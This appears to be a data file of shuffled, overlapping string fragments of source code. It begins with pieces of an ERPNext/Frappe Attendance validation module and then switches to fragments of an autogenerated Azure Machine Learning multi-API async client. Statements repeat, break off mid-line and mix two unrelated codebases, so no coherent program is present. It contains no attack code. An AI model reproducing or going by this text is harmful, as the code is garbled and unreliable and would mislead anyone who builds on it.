frappe from frappe.utils import getdate, nowdate from frappe import _", "frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\") if getdate(self.attendance_date) > getdate(nowdate()): frappe.throw(_(\"Attendance can not be marked for", "{0} for {1}\").format(self.employee, self.attendance_date)) def validate_attendance_date(self): date_of_joining = frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\") if getdate(self.attendance_date)", "= %s and %s between from_date and to_date and docstatus = 1\"\"\", (self.employee,", "%s and name != %s and docstatus = 1\"\"\", (self.employee, self.attendance_date, self.name)) if", "`tabEmployee` where name = %s and status = 'Active'\", self.employee) if not emp:", "\"date_of_joining\") if getdate(self.attendance_date) > getdate(nowdate()): frappe.throw(_(\"Attendance can not be marked for future dates\"))", "not be less than employee's joining date\")) def validate_employee(self): emp = frappe.db.sql(\"select name", "{0} is already marked\").format(self.employee)) set_employee_name(self) def check_leave_record(self): leave_record = frappe.db.sql(\"\"\"select leave_type, half_day from", "= %s and status = 'Active'\", self.employee) if not emp: frappe.throw(_(\"Employee {0} is", "import set_employee_name class Attendance(Document): def validate_duplicate_record(self): res = frappe.db.sql(\"\"\"select name from `tabAttendance` where", "where employee = %s and %s between from_date and to_date and docstatus =", "if not emp: frappe.throw(_(\"Employee {0} is not active or does not exist\").format(self.employee)) def", "self.attendance_date)) else: self.status = 'On Leave' self.leave_type = leave_record[0].leave_type frappe.msgprint(_(\"Employee {0} on Leave", "not exist\").format(self.employee)) def validate(self): from erpnext.controllers.status_updater import validate_status validate_status(self.status, [\"Present\", \"Absent\", \"On Leave\",", "attendance_date = %s and name != %s and docstatus = 
1\"\"\", (self.employee, self.attendance_date,", "leave_record[0].leave_type frappe.msgprint(_(\"Employee {0} on Leave on {1}\").format(self.employee, self.attendance_date)) if self.status == \"On Leave\"", "def validate_attendance_date(self): date_of_joining = frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\") if getdate(self.attendance_date) > getdate(nowdate()): frappe.throw(_(\"Attendance can", "= 1\"\"\", (self.employee, self.attendance_date, self.name)) if res: frappe.throw(_(\"Attendance for employee {0} is already", "= frappe.db.sql(\"select name from `tabEmployee` where name = %s and status = 'Active'\",", "= 'Active'\", self.employee) if not emp: frappe.throw(_(\"Employee {0} is not active or does", "__future__ import unicode_literals import frappe from frappe.utils import getdate, nowdate from frappe import", "frappe.db.sql(\"\"\"select leave_type, half_day from `tabLeave Application` where employee = %s and %s between", "be marked for future dates\")) elif date_of_joining and getdate(self.attendance_date) < getdate(date_of_joining): frappe.throw(_(\"Attendance date", "%s and status = 'Active'\", self.employee) if not emp: frappe.throw(_(\"Employee {0} is not", "employee's joining date\")) def validate_employee(self): emp = frappe.db.sql(\"select name from `tabEmployee` where name", "Day' frappe.msgprint(_(\"Employee {0} on Half day on {1}\").format(self.employee, self.attendance_date)) else: self.status = 'On", "(self.employee, self.attendance_date, self.name)) if res: frappe.throw(_(\"Attendance for employee {0} is already marked\").format(self.employee)) set_employee_name(self)", "See license.txt from __future__ import unicode_literals import frappe from frappe.utils import getdate, nowdate", "import frappe from frappe.utils import getdate, nowdate from frappe import _ from frappe.model.document", "`tabLeave Application` where employee = %s and %s between from_date and to_date and", "Half day on {1}\").format(self.employee, 
self.attendance_date)) else: self.status = 'On Leave' self.leave_type = leave_record[0].leave_type", "'Half Day' frappe.msgprint(_(\"Employee {0} on Half day on {1}\").format(self.employee, self.attendance_date)) else: self.status =", "self.status == \"On Leave\" and not leave_record: frappe.throw(_(\"No leave record found for employee", "is not active or does not exist\").format(self.employee)) def validate(self): from erpnext.controllers.status_updater import validate_status", "for employee {0} is already marked\").format(self.employee)) set_employee_name(self) def check_leave_record(self): leave_record = frappe.db.sql(\"\"\"select leave_type,", "License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import", "marked for future dates\")) elif date_of_joining and getdate(self.attendance_date) < getdate(date_of_joining): frappe.throw(_(\"Attendance date can", "< getdate(date_of_joining): frappe.throw(_(\"Attendance date can not be less than employee's joining date\")) def", "name = %s and status = 'Active'\", self.employee) if not emp: frappe.throw(_(\"Employee {0}", "self.status = 'Half Day' frappe.msgprint(_(\"Employee {0} on Half day on {1}\").format(self.employee, self.attendance_date)) else:" ]
[ "'2021-10-01': from ..v2021_10_01.aio.operations import UsagesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations", "Serializer from ._configuration import AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from azure.core.credentials import", "not have operation group 'batch_job_deployment'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_endpoint(self):", "does not have operation group 'code_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as OperationClass elif api_version", "pass class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These APIs allow end users to operate on Azure", "from ..dataset_dataplane.aio.operations import DataContainerOperations as OperationClass else: raise ValueError(\"API version {} does not", "..dataset_dataplane.aio.operations import DataContainerOperations as OperationClass else: raise ValueError(\"API version {} does not have", "api_version = self._get_api_version('get_operation_status') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import GetOperationStatusOperations as OperationClass", "\"\"\"Instance depends on the API version: * v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version = self._get_api_version('spans')", "@property def temporary_data_references(self): \"\"\"Instance depends on the API version: * 2021-10-01-dataplanepreview: 
:class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\"", "{} does not have operation group 'online_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'data_version'\".format(api_version)) return", "Credential needed for the client to connect to Azure. :type credential: ~azure.core.credentials_async.AsyncTokenCredential :param", "the API version: * 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version = self._get_api_version('extensive_model') if api_version ==", "import DatastoresOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DatastoresOperations as", "the API version: * v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version = self._get_api_version('registry_management_non_workspace') if api_version ==", "version: * 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version = self._get_api_version('data_versions') if api_version", ":class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version = self._get_api_version('dataset_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetV2Operations", "..runhistory 
import models return models elif api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview import models", "import TokenCredential from azure.core.credentials_async import AsyncTokenCredential class _SDKClient(object): def __init__(self, *args, **kwargs): \"\"\"This", "version: * 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version =", "API version: * v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version = self._get_api_version('experiments') if api_version == 'v1.0':", "@property def extensive_model(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\"", "models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module depends on the API version: * 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0:", "depends on the API version: * 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version", "from ..v2022_05_01.aio.operations import JobsOperations as OperationClass else: raise ValueError(\"API version {} does not", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspacesOperations as OperationClass elif 
api_version == '2022-01-01-preview':", "have operation group 'model_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def models(self): \"\"\"Instance", "the API version: * v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version = self._get_api_version('experiments') if api_version ==", "elif api_version == 'v1.0': from ..registry_discovery import models return models elif api_version ==", "api_version = self._get_api_version('virtual_machine_sizes') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations as OperationClass", ":class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version = self._get_api_version('code_containers') if api_version == '2021-10-01': from", "raise ValueError(\"API version {} does not have operation group 'workspace_connections'\".format(api_version)) return OperationClass(self._client, self._config,", "else: raise ValueError(\"API version {} does not have operation group 'environment_versions'\".format(api_version)) return OperationClass(self._client,", "RunArtifactsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "= self._get_api_version('workspace_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as OperationClass elif", "cls.models(api_version).__dict__.items() if isinstance(v, type)} @classmethod def models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module depends on the API", "code_versions(self): \"\"\"Instance depends on the API 
version: * 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>`", "api_version = self._get_api_version('workspaces') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspacesOperations as OperationClass", "version {} does not have operation group 'experiments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "Deserializer(self._models_dict(api_version))) @property def migration(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>`", "elif api_version == 'v1.0': from ..runhistory import models return models elif api_version ==", "group 'workspace_features'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspaces(self): \"\"\"Instance depends on", "the API version: * 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` *", "described in the profile. 
:param credential: Credential needed for the client to connect", "group 'runs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def spans(self): \"\"\"Instance depends on", "raise ValueError(\"API version {} does not have operation group 'operations'\".format(api_version)) return OperationClass(self._client, self._config,", "api_version == '1.5.0': from ..dataset_dataplane import models return models elif api_version == '1.0.0':", "import PrivateEndpointConnectionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "ValueError(\"API version {} does not have operation group 'spans'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "OnlineDeploymentsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version = self._get_api_version('data_versions') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "self._get_api_version('operations') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import Operations as OperationClass elif api_version", "1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version = self._get_api_version('assets') if api_version == '1.0.0': from ..model_dataplane.aio.operations import", "does not have operation group 'metric'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "from ..dataset_dataplane.aio.operations import GetOperationStatusOperations as OperationClass else: 
raise ValueError(\"API version {} does not", "2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version = self._get_api_version('operations') if", "\"\"\" api_version = self._get_api_version('registry_management_non_workspace') if api_version == 'v1.0': from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as", "import OnlineDeploymentsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs) super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version, profile=profile ) @classmethod def _models_dict(cls, api_version): return", "not have operation group 'metric'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def migration(self):", "profile: A profile definition, from KnownProfiles to dict. :type profile: azure.profiles.KnownProfiles :keyword int", "License.txt in the project root for # license information. 
# # Code generated", "not have operation group 'models'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_deployments(self):", "{} does not have operation group 'component_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version = self._get_api_version('datastores') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "does not have operation group 'get_operation_status'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "Deserializer(self._models_dict(api_version))) @property def operations(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>`", "on the API version: * 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version = self._get_api_version('data_version') if api_version", "import DatastoresOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "= self._get_api_version('private_link_resources') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as OperationClass elif", "* 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview: 
:class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\"", ":mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if api_version == '1.5.0': from ..dataset_dataplane import models return models elif", "..dataset_dataplane import models return models elif api_version == '1.0.0': from ..model_dataplane import models", "def data_container(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version", "group 'temporary_data_references'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def usages(self): \"\"\"Instance depends on", "import BatchEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as", "version {} does not have operation group 'quotas'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeContainersOperations as OperationClass else: raise ValueError(\"API", "elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as OperationClass elif api_version ==", "1.5.0: 
:class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version = self._get_api_version('get_operation_status') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import", "from ..v2022_05_01.aio.operations import ModelVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not", "have operation group 'run_artifacts'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def runs(self): \"\"\"Instance", "import RegistryManagementNonWorkspaceOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datastores(self): \"\"\"Instance depends on the API", "models return models elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview import models return models", "Deserializer(self._models_dict(api_version))) @property def extensive_model(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>`", "api_version = self._get_api_version('online_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations as OperationClass", "* 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version = self._get_api_version('models') if api_version == '1.0.0': from ..model_dataplane.aio.operations", "= self._get_api_version('code_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeContainersOperations as OperationClass elif", 
":class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version = self._get_api_version('jobs') if api_version", "from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import", "version: * v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version = self._get_api_version('metric') if api_version == 'v1.0': from", "* 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version = self._get_api_version('online_endpoints')", "= self._get_api_version('dataset_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetV2Operations as OperationClass else:", "ValueError(\"API version {} does not have operation group 'environment_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "import EnvironmentContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "import CodeVersionsOperations as 
OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations as", "* 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version = self._get_api_version('environment_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "from ..v2021_10_01.aio.operations import JobsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "== 'v1.0': from ..registry_discovery import models return models elif api_version == 'v1.0': from", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_connections(self): \"\"\"Instance depends on the API version: *", "version: * 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version =", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_features(self): \"\"\"Instance depends on the API version: *", "from ..v2021_10_01.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import", "have operation group 'migration'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_containers(self): \"\"\"Instance", 
"have operation group 'metric'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def migration(self): \"\"\"Instance", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspacesOperations as OperationClass elif api_version == '2022-05-01':", "self._get_api_version('dataset_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetContainersOperations as OperationClass else: raise", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspaces(self): \"\"\"Instance depends on the API version:", ":class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version = self._get_api_version('online_endpoints') if api_version", ":class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version = self._get_api_version('model_versions') if api_version == '2021-10-01': from", "{} does not have operation group 'batch_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), 
Deserializer(self._models_dict(api_version))) @property def delete(self): \"\"\"Instance depends on the API", "import ModelContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelContainersOperations as", "ValueError(\"API version {} does not have operation group 'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version = self._get_api_version('compute') if", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_endpoints(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "'compute'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_call(self): \"\"\"Instance depends on the", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview':", "the client to connect to Azure. 
:type credential: ~azure.core.credentials_async.AsyncTokenCredential :param subscription_id: The ID", "else: raise ValueError(\"API version {} does not have operation group 'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client,", "the API version: * v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version = self._get_api_version('run') if api_version ==", "from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "if api_version == 'v1.0': from ..runhistory.aio.operations import SpansOperations as OperationClass else: raise ValueError(\"API", "def dataset_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def metric(self): \"\"\"Instance depends on the API version:", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'async_operations'\".format(api_version)) return", "self._get_api_version('dataset_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetV2Operations as OperationClass else: raise", "'2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview import models return models elif api_version == '2021-10-01': from ..v2021_10_01", "does not have operation group 'model_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "import DatasetVersionsOperations as OperationClass else: raise ValueError(\"API version {} does 
not have operation", "not have operation group 'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_link_resources(self):", "import MultiApiClientMixin from msrest import Deserializer, Serializer from ._configuration import AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING:", "the API version: * 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version = self._get_api_version('data_call') if api_version ==", "\"\"\" api_version = self._get_api_version('run_artifacts') if api_version == 'v1.0': from ..runhistory.aio.operations import RunArtifactsOperations as", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_versions(self): \"\"\"Instance depends on the API", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def registry_management_non_workspace(self): \"\"\"Instance depends on the API version:", "raise ValueError(\"API version {} does not have operation group 'component_containers'\".format(api_version)) return OperationClass(self._client, self._config,", "self._get_api_version('environment_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version", "depends on the API version: * v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version = self._get_api_version('runs') if", "OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspacesOperations as OperationClass elif api_version", "depends 
on the API version: * 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version = self._get_api_version('get_operation_status') if", "\"\"\"Instance depends on the API version: * v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version = self._get_api_version('runs')", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'data_containers'\".format(api_version)) return", "**kwargs # type: Any ) -> None: self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs) self._client", "api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataVersionOperations as OperationClass else: raise ValueError(\"API version", "if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations as OperationClass else: raise ValueError(\"API", "does not have operation group 'data_version'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "import KnownProfiles, ProfileDefinition from azure.profiles.multiapiclient import MultiApiClientMixin from msrest import Deserializer, Serializer from", "else: raise 